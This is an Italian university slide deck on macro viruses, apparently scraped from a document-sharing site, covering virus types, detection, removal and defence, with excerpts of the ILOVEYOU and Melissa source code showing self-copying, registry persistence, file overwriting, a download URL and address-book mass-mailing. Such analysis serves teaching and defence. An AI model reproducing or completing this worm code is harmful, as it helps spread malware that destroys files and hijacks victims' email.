MACRO VIRUS MACRO VIRUS. dsfsdfdsf. Sicurezza su reti. Sicurezza su reti

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "MACRO VIRUS MACRO VIRUS. dsfsdfdsf. Sicurezza su reti. Sicurezza su reti"

Transcript

1 MACRO VIRUS MACRO VIRUS UNIVERSITA DEGLI STUDI DI SALERNO Dott.ssa Barbara Masucci Realizzato da: Cuozzo Piergiuseppe Malangone Alessandro Tipi Virus Definizione di Macro Virus Come agisce un Macro Virus Problemi causati Infezione e rimozione In dettaglio I love You Melissa Come difendersi MACRO VIRUS 1 MACRO VIRUS 2 Cosa sono i virus Tipi di virus Il Virus si distingue da un normale programma per tre caratteristiche fondamentali: E' ospite in un file eseguibile, in un settore di boot,, o in un file di documento. Si autoreplica. Compie tutte queste operazioni in maniera nascosta all'utente. Bombe ANSI Bombe logiche A Cifratura del codice Residenti in memoria Virus companion Virus di macro Virus multipartito Virus del file system Cavalli di Troia Worm Polimorfici MACRO VIRUS 3 MACRO VIRUS 4 Che cos è una MACRO Macro Virus - Definizione Le Macro sono delle procedure automatizzate che permettono di eseguire diverse procedure in sequenza. Esempio di Macro: I macro virus sono generalmente script incorporati all'interno di particolari documenti (come ad esempio MS Word,Excel) Possono essere eseguiti all atto dell apertura di un documento. Il mezzo principale di trasmissione di questi virus sono le . Vanno ad infettare il modello che i programmi utilizzano per creare nuovi documenti. MACRO VIRUS 5 MACRO VIRUS 6 1

2 Macro Virus - Definizione Problemi causati Il file globale Normal.dot mantiene tutte le informazioni su un nuovo documento:la formattazione, il tipo di carattere e la dimensione, ecc.. La capacità del virus di duplicarsi è garantita dalla possibilità di essere eseguito automaticamente al momento dell apertura di un file. Cancellazione di icone. Cancellazione di dati. Occupazione di memoria e blocco del sistema. Salvataggio dei documenti solo in formato.txt MACRO VIRUS 7 MACRO VIRUS 8 Smascherare i Macro Virus Protezione da Macro Aprendo la voce Macro nel menu Strumenti appariranno macro con nomi composti dalle seguenti parole: ToolsMacro, Payload ; AAAZAO, AAAZF; "virus, InsertPayLoad. Per proteggersi dai Macro Virus si deve attivare la protezione da Macro potenzialmente non sicure tramite il menu Strumenti/Macro/Protezione, scegliendo il relativo livello di protezione. Non sempre valido MACRO VIRUS 9 MACRO VIRUS 10 Protezione da Macro Protezione da Macro Se la protezione è attivata, ogni volta che si apre un documento Word contenente una macro, viene visualizzata una finestra di dialogo in cui è possibile scegliere di attivare le macro. Si può anche selezionare l opzione Richiedi salvataggio modello Normal dalla finestra di dialogo Opzioni/Salva nel menu strumenti. MACRO VIRUS 11 MACRO VIRUS 12 2

3 Rimozione Macro Virus più comuni 1. Eliminare il file Normal.dot e sostituirlo con un file normal.dot pulito,tramite il menu Strumenti/Modelli. 2. Attivare la protezione da Macro Virus. 3. Aprire tutti i file di Word. 4. Cancellare il codice virale nell editor di Visul Basic, nei documenti che contengono una macro. 5. Salvare il file con un altro nome, chiudere il tutto ed eliminare il vecchio file. Ripulito il file passare agli altri procedendo nello stesso modo. Word Macro/Concept Word Macro/Atom Word Macro/Bandung Word Macro/Colors Word Macro/Nuclear Melissa I Love You MACRO VIRUS 13 MACRO VIRUS 14 I Love You I Love You - L autore Il mese di Maggio del 2000 è stato segnato dalla comparsa del virus "I Love You. Scritto in Visual Basic Script, linguaggio prossimo a Visual Basic. Si propagava per sotto forma di allegato. Con un nome così accattivante furono molte le vittime a cadere nel tranello. L autore: Onel De Guzman Uno dei migliori studenti dell'ama, una catena di college informatici molto popolare nel Sus-Est asiatico. Lì entrò a far parte di un gruppo chiamato Grammersoft. Sarà proprio quel fatidico nome, ritrovato all'interno dello script di I love you, a convogliare i sospetti su di lui. Ritenuto responsabile di aver creato e immesso in rete il virus informatico più dannoso mai creato. MACRO VIRUS 15 MACRO VIRUS 16 Il codice è composto da 8 subroutines : main() regruns() listadriv infectfiles(folderspec) folderlist (folderspec) regcreate(regkey, regvalue) spreadto () html() e dalle tre funzioni: regget(value) fileexist() folderexist(folderspec) Le prime righe del codice del virus sono dedicate ai commenti e alle impostazioni di alcune variabili che poi saranno usate nel programma. Le due prime righe del code source corrispondono alla firma degli autori del virus, firma che dall'inizio ha fatto pensare che il virus provenisse dalle filippine. rem barok -loveletter(vbe) rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / Group / Manila,Philippines MACRO VIRUS 17 MACRO VIRUS 18 3

4 Neutralizza le difese da macro sub regruns() On Error Resume Next Dim num,downread set fso = CreateObject("Scripting.FileSystemObject ) set file = fso.opentextfile(wscript.scriptfullname,1) vbscopy=file.readall Crea la variabile oggetto per la lettura dei file presenti sul disco La sub main() imposta alcune variabili usate nelle successive routine e crea nell'ordine i tre files "MSKernel32.vbs", "Win32DLL.VBS" e LOVE-LETTER-FOR-YOU.TXT.vbs". Set dirwin = fso.getspecialfolder(0) Set dirsystem = fso.getspecialfolder(1) Set dirtemp = fso.getspecialfolder(2) Set c = fso.getfile(wscript.scriptfullname) c.copy(dirsystem&"\mskernel32.vbs") files c.copy(dirwin&"\win32dll.vbs") c.copy(dirsystem&"\love-letter-for-you.txt.vbs") [...] Main( ) MACRO VIRUS 19 MACRO VIRUS 20 I Love You Codice In seguito vengono lanciate le seguenti routines: regruns() html() La procedura regruns infetta la base dei registri con il fine di spreadto () eseguire il virus ad ogni avvio del PC. listadriv() regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" MACRO VIRUS 21 Individua la directory impostata di default per lo scaricamento dei file da internet e verifica l esistenza del file "WinFAT32.exe" nella directory di Windows. downread="" downread=regget("hkey_current_user\software\ Microsoft\InternetExplorer\Download Directory") Se non esiste prende come default C:\ if (downread="") then downread="c:\" MACRO VIRUS 22 Se esiste "WinFAT32.exe" nella directory di Windows il virus modifica (attraverso il Registro) la Pagina Iniziale di MS Internet Explorer inserendo l indirizzo del file "WIN-BUGFIX.EXE" posto in una sottodirectory del sito La sub verifica poi l'esistenza del file WIN-BUGSFIX.exe nella directory predefinita per il download e imposta il Registro per eseguirlo a ogni avvio del computer. if (fileexist(dirsystem&"\winfat32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w gvsdf7679njbvyt/win-bugsfix.exe" if (fileexist(downread&"\win-bugsfix.exe")=0) then regcreate"hkey_local_machine\software\microsoft\windows\current Version\Run\WIN- BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank" Dopodiché la Pagina Iniziale di Explorer diventa "about:blank" end sub MACRO VIRUS 23 MACRO VIRUS 24 4

5 Verifica i driver presenti sul disco e per ogni unità esegue la funzione folderlist( ). listdriv ( ) Infectfiles( ) Sostituisce i file: Script,JPEG, mp3 con una copia del virus. Ricerca il programma mirc al fine di propagarsi ad altri utenti. folderlist( ) Chiama la funzione infectfiles ( ) if (ext="vbs") or (ext="vbe") then set ap=fso.opentextfile(f1.path,2,true) ap.write vbscopy Individua e cancella tutti i files con estensione:*.vbs, *.vbe ap.close MACRO VIRUS 25 MACRO VIRUS 26 Idem con i file con estensione.css,.whs e js che sono cancellati e rimpiazzati da file con lo stesso nome ma aventi l'estensione.vbs elseif(ext="jpg") or (ext="jpeg") then set ap=fso.opentextfile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.getfile(f1.path) cop.copy(f1.path&".vbs") fso.deletefile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.createtextfile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.getfile(f1.path) att.attributes=att.attributes+2 MACRO VIRUS 27 Il virus I Love You testa infine il nostro computer per verificare la presenza del programma mirc, creando nella sua cartella il file SCRIPT.INI, contenente i comandi per inviare una pagina html contenente la copia del virus. if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set [scriptini=fso.createtextfile(folderspec&"\script.ini") scriptini.writeline "[script]" scriptini.writeline ";mirc Script" scriptini.writeline "; Please dont edit this script... mirc will corrupt,... MACRO VIRUS 28 La routine html() crea una pagina HTML contente il codice virale nella directory di Windows con il nome "LOVE-LETTER-FOR- YOU.HTM", che sarà trasmessa ai vari corrispondenti via IRC.. Questa pagina HTML contiene un ActiveX (vbscript) con il fine di richiamare l'attenzione della vittima. MACRO VIRUS 29 regcreate( )Imposta i registri di sistema spreadto ( ) crea il messaggio contenente il virus e lo spedisce a tutti i membri della rubrica. regv=regedit.regread("hkey_current_user\software\microsoft\wab\"&a) if (regv="") then regv=1 Il virus richiama l'applicazione Wab.exe, una rubrica di Outlook. if (int(a.addressentries.count)>int(regv)) then for ctrentries=1 to a.addressentries.count maled=a.addressentries(x) reagd="" regad=regedit.readread("hkey_current_user\software\microsoft\wab\"&malead) if (regad="") then MACRO VIRUS 30 5

6 I Love You - Rimozione Viene creato il messaggio contenente il virus e spedito a tutti i membri della rubrica. Vediamo inoltre che il soggetto che contiene il virus e "I Love You", e che il corpo del messaggio, vale a dire il testo è "Kindly check the attacched loveletter coming from me". set male=out.createitem(0) male.recipients.add(maled) male.subject = "ILOVEYOU" male.body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.attachments.add(dirsystem&"\love-letter-for-you.txt.vbs") male.send regedit.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Wab\ "&malead,1,"reg_dword" MACRO VIRUS 31 Rimuovere i file: LOVE-LETTER-FOR-YOU.HTM (dalla cartella di sistema) WIN-BUGSFIX.EXE, WINFAT32.EXE (dalla cartella dei file scaricati da internet).vbs (da tutte le cartella del sistema) SCRIPT.INI (nella cartella di mirc) MACRO VIRUS 32 Melissa Melissa Diffusione e attivazione Si tratta di un virus macro di Word trasmesso tramite posta elettronica in un documento Word allegato. W97 M/Melissa.A Il messaggio contiene: La dicitura "Important Message From "nome utente" nel campo dell'oggetto. Il testo "Here is that document you asked for... don't show anyone else ;-)" Diffusione tramite posta elettronica con un file list.doc allegato. E in grado di propagarsi inviando messaggi di posta elettronica ai primi 50 indirizzi in rubrica. Il virus possiede anche una particolare routine la cui azione viene eseguita solo nel caso in cui il numero del giorno corrisponda a quello dei minuti. MACRO VIRUS 33 MACRO VIRUS 34 Melissa Descrizione tecnica Melissa Trasmissione Nome della macro infetta in cui vengono ignorati gli errori quando Melissa è in esecuzione e neutralizzate le difese di Word. Private Sub Document_Open() On Error Resume Next End Sub If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)" Si autospedisce ai primi 50 indirizzi nella rubrica Nel "soggetto" (subject) del messaggio viene inserito il testo "Important Message From [UsareName]" (UserName è una variabile e conterrà il nome dell'utente di Outlook). Nel corpo del messaggio viene scritto il testo "Here is that document you asked for... don't show anyone else ;-)" MACRO VIRUS 35 MACRO VIRUS 36 6

7 Melissa Trasmissione BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff Allega il documento infetto alla posta e poi spedisce l . System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft \Office\", "Melissa?") = "... by Kwyjibo " Prima dell'invio, il virus controlla il Registro di sistema ricercando una chiave particolare. Il codice del virus contiene un modulo chiamato "Melissa", nel quale è presente una funzione automatica: "Document_Open" "Document_Close" Il virus infetta il modello NORMAL.DOT quando vengono aperti dei documenti infetti e si diffonde ad altri documenti quando questi ultimi vengono chiusi. MACRO VIRUS 37 MACRO VIRUS 38 Infetta il documento corrente... Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1=NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name<>"Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines1, ADCL SetToInfect= ADI1 ADI1.Name = "Melissa" DoAD = True MACRO VIRUS 39 Copia il virus nella macro Document_Close... If Dont = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines1 Loop ToInfect.CodeModule.AddFromString("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLinesBGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop MACRO VIRUS 40 Copia il virus nella macro Document_Open... If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines Loop ToInfect.CodeModule.AddFromString("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop Salva il documento infetto WORD/Melissa written by Kwyjibo Works in both Word 2000 and Word 97 Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! Word -> Word 97 <--> Word it's a new age! CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1,ActiveDocument.Name, "Document"=False)Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1,ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved=True Commenti MACRO VIRUS 41 MACRO VIRUS 42 7

8 Melissa Trigger Routine Melissa Come difendersi Il Virus contiene anche una speciale routine. If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub Verificare che la protezione da virus macro di Office sia attivata. Eseguire un programma anti-virus aggiornato e controllare il sistema con frequenza. Eliminare o rinominare il file Normal.dot. Questo modello globale di Word viene ricreato automaticamente all'avvio di Word. MACRO VIRUS 43 MACRO VIRUS 44 Come difendersi sicura Antivirus Profilassi informatica sicura Molti virus sono allegati ai messaggi con nomi invitanti oppure sono infilati dentro al codice HTML dei messaggi stessi sotto forma di script. Alcuni metodi di mascheramento: File Spoofing R er Anonimi Verificare le regole di base del client di posta Se necessario utilizzare programmi specifici PGP Firma digitale tramite società dedicate Registrare un account con transazione protetta con crittografia e passphrase su MACRO VIRUS 45 MACRO VIRUS 46 Tipologie di antivirus-principi di funzionamento Tipologie di antivirus-principi di funzionamento Software scritti per intercettare, prevenire ed eliminare l'azione di virus e di altri tipi di malware. In genere vi sono tre tipi di AntiVirus:Monitoraggio, Scanner e di Rilevamento. Altri tipi di protezione possono essere da scrittura, lettura,... DI MONITORAGGIO Tentano di prevenire un'infezione controllando attività sospette (riformattare un disco,...). SCANNER Ricercano nel sistema (file, memoria e settori di avvio) le stringhe caratteristiche dei virus conosciuti. DI RILEVAMENTO Verificatori dell integrità (utile per la rilevazione di virus che modificano la struttura dei file). Tecnica euristica (ricerca le istruzioni e i funzionamenti sospetti) Programmi di decrittazione generica (utilizzati per rilevare i virus criptati e polimorfici). MACRO VIRUS 47 MACRO VIRUS 48 8

9 Tipologie di antivirus-l attacco dei retrovirus Tipologie di antivirus-l attacco dei retrovirus Un problema molto importante riguarda l'efficienza dell'antivirus a respingere attacchi di tipo retrovirale. Per attacchi "retrovirali", si intendono quelli in cui il virus è in grado di aggirare e disattivare l'antivirus, o comunque di renderlo inefficace nei confronti del virus stesso. A prescindere dalle caratteristiche di ogni singolo antivirus, le componenti essenziali sono le seguenti: Interfaccia grafica(programma o servizio eseguibile.exe) Driver di scansione (driver di sistema.vxd, o.sys) Come mai è possibile che un worm che opera come un programma eseguibile, possa in qualche maniera compromettere la sicurezza di un antivirus? I due moduli sono in continuo contatto tra di loro e quando il modulo eseguibile viene disabilitato anche la parte relativa al driver smette di funzionare. MACRO VIRUS 49 MACRO VIRUS 50 Profilassi informatica Profilassi informatica (2) Non aprire file con estensioni 386, BIN, CMD, DEV, DLL, DOC, DOT, EXE, INF MD?, MPP, MPT, OBT, OLE, XL?, VXD, OVL, PP?, POT, PIF SCR, SHS, SYS, VBS, XPT senza averli controllati con un antivirus aggiornato. Utilizzare un server di posta che faccio un controllo antivirus. Disattivare qualsiasi funzione di visualizzazione automatica. Installare e tenere aggiornato un firewall. Compiere Backup regolari Verificare ogni nuovo software o dischetto Prepararsi al sicuro un disco di Boot pulito per compiere la scansione Prestare attenzione a nuovi comportamenti del PC: Improvvisi crash del sistema Quando un programma generico di monitoraggio dà un allarme L'impossibilità di avviare il proprio computer con messaggi del tipo "missing operating system Comportamenti inusuali MACRO VIRUS 51 MACRO VIRUS 52 9

La diffusione dei virus informatici nel mondo ad Agosto 2001 in base alla percentuale di infezioni sul totale

La diffusione dei virus informatici nel mondo ad Agosto 2001 in base alla percentuale di infezioni sul totale Macro Virus Bruno Marisa Radica Diego Sessa Clelia Realizzato Da: MARISA.BRUNO@poste. it diego.radica@libero..radica@libero.itit clelia28@interfree.itit Macro Virus 1 Che cos è un virus. Definizione di

Dettagli

Codice malizioso. Codice malizioso. Il termine Virus. Codice malizioso

Codice malizioso. Codice malizioso. Il termine Virus. Codice malizioso Codice malizioso Codice malizioso Barbara Masucci Dipartimento di Informatica ed Applicazioni Università di Salerno masucci@dia.unisa.it http://www.dia.unisa.it/professori/masucci Dopo una violazione del

Dettagli

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano

Dettagli

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio Modulo 1 Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio La sicurezza dei sistemi informatici Tutti i dispositivi di un p.c.

Dettagli

Talento LAB 8.1 - LA GESTIONE DEI VIRUS I VIRUS INFORMATICI. In questa lezione imparerete a:

Talento LAB 8.1 - LA GESTIONE DEI VIRUS I VIRUS INFORMATICI. In questa lezione imparerete a: LAB 8.1 - LA GESTIONE DEI VIRUS In questa lezione imparerete a: Definire cos è un virus informatico e quali possono essere i suoi effetti, Stabilire i vari metodi di contagio, Comprendere i vantaggi di

Dettagli

SidekickPC 3.0 Risoluzione Problemi 31 MAGGIO 2012

SidekickPC 3.0 Risoluzione Problemi 31 MAGGIO 2012 SidekickPC 3.0 Risoluzione Problemi 31 MAGGIO 2012 2012 Electrolux Italia S.p.A., All rights reserved INDICE 1. ERRORI DI PROGRAMMA DOPO AGGIORNAMENTO ALLA VERSIONE 3.0... 2. MESSAGGI NELLA FINESTRA DI

Dettagli

Sicurezza dei file Le protezioni nei programmi

Sicurezza dei file Le protezioni nei programmi Sicurezza dei file Le protezioni nei programmi Attivare/disattivare le impostazioni di sicurezza delle macro. Una macro è un insieme d istruzioni che il computer interpreta una dopo l altra e traduce in

Dettagli

Progetto di Sicurezza dei Sistemi Informatici: I virus e la loro storia

Progetto di Sicurezza dei Sistemi Informatici: I virus e la loro storia Progetto di Sicurezza dei Sistemi Informatici: I virus e la loro storia Studente: Statello Christian ( A40/000213 ) 2008-2009 1 1. Introduzione..pag 3 2. Cos è un virus, dove si trova e come funziona..pag

Dettagli

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE PREMESSA La presente guida è da considerarsi come aiuto per l utente per l installazione e configurazione di Atollo Backup. La guida non vuole approfondire

Dettagli

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido ESET NOD32 Antivirus 4 per Linux Desktop Guida all'avvio rapido ESET NOD32 Antivirus 4 fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense

Dettagli

Navigazione in modalità InPrivate Browsing

Navigazione in modalità InPrivate Browsing G. Pettarin ECDL Modulo 7: Internet 52 Se selezioni questa modalità di navigazione si apre una nuova finestra del browser, come quella nella figura sottostante. Navigazione in modalità InPrivate Browsing

Dettagli

per Mac Guida all'avvio rapido

per Mac Guida all'avvio rapido per Mac Guida all'avvio rapido ESET Cybersecurity fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense introdotto per la prima volta

Dettagli

Istruzioni Aggiornamento RGT Xml

Istruzioni Aggiornamento RGT Xml Istruzioni Aggiornamento RGT Xml Sommario Installazione dell'aggiornamento... 2 Download...2 Installazione...2 Modulo RGT - Utilizzo e Funzioni... 7 Dati Generali...9 Testatore...10 Atto...12 Atto Di Riferimento...13

Dettagli

COME UTILIZZARLO 1) Scaricare il software dall indirizzo http://it.clamwin.com/content/view/18/46/

COME UTILIZZARLO 1) Scaricare il software dall indirizzo http://it.clamwin.com/content/view/18/46/ A PROPOSITO DI SICUREZZA DEL PC E DI ANTIVIRUS CLAMWIN 0.94.1 http://it.clamwin.com/ ClamWin è un antivirus gratuito per Microsoft Windows 98/Me/2000/XP/2003/Vista. ClamWin Free Antivirus è dotato di un

Dettagli

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Sommario F-Secure Anti-Virus for Mac 2015 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Gestione abbonamento...4 1.2 Come verificare che il computer sia protetto...4

Dettagli

IL SISTEMA APPLICATIVO WORD

IL SISTEMA APPLICATIVO WORD Programma di Alfabetizzazione informatica Corso di II^ livello a.s. 2014/2015 IL SISTEMA APPLICATIVO WORD Approfondimenti del Menu pricipale di Word : inserisci, formato, strumenti Personalizzazione di

Dettagli

Capitolo 1: Operazioni preliminari...3

Capitolo 1: Operazioni preliminari...3 F-Secure Anti-Virus for Mac 2014 Sommario 2 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Operazioni da effettuare in seguito all'installazione...4 1.1.1 Gestione abbonamento...4 1.1.2 Come aprire

Dettagli

Guida all'installazione (Italiano) Primi passi

Guida all'installazione (Italiano) Primi passi Primi passi Guida all'installazione (Italiano) Siamo lieti che Lei abbia deciso di acquistare il nostro prodotto e speriamo che resterà pienamente soddisfatto del suo nuovo software. In caso di problemi

Dettagli

Sophos Computer Security Scan Guida di avvio

Sophos Computer Security Scan Guida di avvio Sophos Computer Security Scan Guida di avvio Versione prodotto: 1.0 Data documento: febbraio 2010 Sommario 1 Software...3 2 Cosa fare...3 3 Preparazione per la scansione...3 4 Installazione del software...4

Dettagli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE - CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE Di cosa parleremo Definizioni di virus e malware. Danni che i virus possono provocare. Rimedi che possiamo applicare.

Dettagli

Le principali novità di Word XP

Le principali novità di Word XP Le principali novità di Word XP di Gemma Francone supporto tecnico di Mario Rinina Il programma può essere aperto in diversi modi, per esempio con l uso dei pulsanti di seguito riportati. In alternativa

Dettagli

Specifiche di installazione LibreOffice tramite policy di Active Directory

Specifiche di installazione LibreOffice tramite policy di Active Directory foto di Samuele Ghilardi Specifiche di installazione LibreOffice tramite policy di Active Directory curato da Andrea Castellani, Sonia Montegiove, Alfredo Parisi Il presente documento è finalizzato a fornire

Dettagli

Anno 2009/2010 Syllabus 5.0

Anno 2009/2010 Syllabus 5.0 Patente Europea di Informatica ECDL Modulo 2 Lezione 3: Pannello di controllo Caratteristiche del sistema Gestione delle stampe Utilità Anno 2009/2010 Syllabus 5.0 Il Pannello di Controllo permette di

Dettagli

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti Potete immaginare un ufficio senza archivio? Sarebbe un inferno. Dover rintracciare

Dettagli

Usare la webmail Microsoft Hotmail

Usare la webmail Microsoft Hotmail Usare la webmail Microsoft Hotmail Iscriversi ad Hotmail ed ottenere una casella di posta Innanzitutto è necessario procurarsi una casella di posta elettronica (detta anche account di posta elettronica)

Dettagli

Impostare il browser per navigare in sicurezza Opzioni di protezione

Impostare il browser per navigare in sicurezza Opzioni di protezione Impostare il browser per navigare in sicurezza Opzioni di protezione Data la crescente necessità di sicurezza e tutela dei propri dati durante la navigazione in rete, anche gli stessi browser si sono aggiornati,

Dettagli

filrbox Guida all uso dell interfaccia WEB Pag. 1 di 44

filrbox Guida all uso dell interfaccia WEB Pag. 1 di 44 filrbox Guida all uso dell interfaccia WEB Pag. 1 di 44 Sommario Introduzione... 4 Caratteristiche del filrbox... 5 La barra principale del filrbox... 7 Elenco degli utenti... 8 Il profilo... 9 Le novità...

Dettagli

Corso di Informatica

Corso di Informatica Corso di Informatica CL3 - Biotecnologie Orientarsi nel Web Prof. Mauro Giacomini Dott. Josiane Tcheuko Informatica - 2006-2007 1 Obiettivi Internet e WWW Usare ed impostare il browser Navigare in internet

Dettagli

Avviare il computer e collegarsi in modo sicuro utilizzando un nome utente e una password.

Avviare il computer e collegarsi in modo sicuro utilizzando un nome utente e una password. Uso del computer e gestione dei file Primi passi col computer Avviare il computer e collegarsi in modo sicuro utilizzando un nome utente e una password. Spegnere il computer impiegando la procedura corretta.

Dettagli

MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP)

MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP) 7.4 POSTA ELETTRONICA MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP) prima parte 7.4.1 Concetti e termini 7.4.1.1 Capire come è strutturato un indirizzo di posta elettronica Tre parti

Dettagli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS. R.Remoli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS. R.Remoli - CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE R.Remoli Di cosa parleremo Definizioni di virus e malware. Danni che i virus possono provocare. Rimedi che possiamo

Dettagli

Installazione di GFI WebMonitor

Installazione di GFI WebMonitor Installazione di GFI WebMonitor Requisiti di sistema di GFI WebMonitor Server Microsoft Windows 2000 (SP 3) o 2003. Microsoft ISA 2000 Server (non in modalità solo firewall) OPPURE Server Microsoft ISA

Dettagli

Sophos Endpoint Security and Control Guida di avvio per computer autonomi

Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control versione 9 Sophos Anti-Virus per Mac OS X, versione 7 Data documento: ottobre 2009 Sommario

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE SYLLABUS VERSIONE 5.0

EUROPEAN COMPUTER DRIVING LICENCE SYLLABUS VERSIONE 5.0 Pagina I EUROPEAN COMPUTER DRIVING LICENCE SYLLABUS VERSIONE 5.0 Modulo 7 Navigazione web e comunicazione Il seguente Syllabus è relativo 7, Navigazione web e comunicazione, e fornisce i fondamenti per

Dettagli

2 Dipendenza da Internet 6 2.1 Tipi di dipendenza... 6 2.2 Fasi di approccio al Web... 6 2.3 Fine del corso... 7

2 Dipendenza da Internet 6 2.1 Tipi di dipendenza... 6 2.2 Fasi di approccio al Web... 6 2.3 Fine del corso... 7 Sommario Indice 1 Sicurezza informatica 1 1.1 Cause di perdite di dati....................... 1 1.2 Protezione dei dati.......................... 2 1.3 Tipi di sicurezza........................... 3 1.4

Dettagli

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo

Dettagli

Manuale LiveBox CLIENT DESKTOP (WINDOWS)

Manuale LiveBox CLIENT DESKTOP (WINDOWS) 2014 Manuale LiveBox CLIENT DESKTOP (WINDOWS) LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di

Dettagli

Capitolo 1 Installazione del programma

Capitolo 1 Installazione del programma Capitolo 1 Installazione del programma Requisiti Hardware e Software Per effettuare l installazione del software Linea Qualità ISO, il computer deve presentare una configurazione minima così composta:

Dettagli

zonamatematica etutor EDITOR Guida all uso versione 4.1

